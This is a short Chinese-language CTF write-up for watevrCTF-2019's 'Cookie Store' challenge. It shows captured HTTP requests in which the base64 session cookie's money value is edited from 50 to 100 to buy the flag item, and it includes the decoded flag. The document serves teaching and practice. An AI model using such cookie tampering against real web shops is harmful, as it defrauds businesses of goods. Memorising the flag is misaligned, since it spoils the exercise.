[watevrCTF-2019]Cookie Store
卖饼干的网站,第三个是flag,我们直接买第三个然后抓包,当然我们钱不够的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| POST /buy HTTP/1.1
Host: f5b9bd89-3416-4487-8331-105ff82bb4fb.node5.buuoj.cn:81
Content-Length: 4
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://f5b9bd89-3416-4487-8331-105ff82bb4fb.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://f5b9bd89-3416-4487-8331-105ff82bb4fb.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Cookie: session=eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ==
Connection: keep-alive
id=2
|
这个报文不带有我们的钱数,这显然不太可能,我们猜测这个Cooike是有东西的
果然,我们直接改成100应该就行了,然后放包
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| POST /buy HTTP/1.1
Host: f5b9bd89-3416-4487-8331-105ff82bb4fb.node5.buuoj.cn:81
Content-Length: 4
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://f5b9bd89-3416-4487-8331-105ff82bb4fb.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://f5b9bd89-3416-4487-8331-105ff82bb4fb.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Cookie: session=eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbXX0=
Connection: keep-alive
id=2
|
返回报文
1
2
3
4
5
6
7
8
9
10
11
| GET / HTTP/1.1
Host: f5b9bd89-3416-4487-8331-105ff82bb4fb.node5.buuoj.cn
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://f5b9bd89-3416-4487-8331-105ff82bb4fb.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Cookie: session=eyJtb25leSI6IDAsICJoaXN0b3J5IjogWyJmbGFnezAyY2VmODA1LTZmYzItNGZiMC04OGM5LWNhNjc0YjNiNzg5OX1cbiJdfQ==
Connection: keep-alive
|
解密获得flag
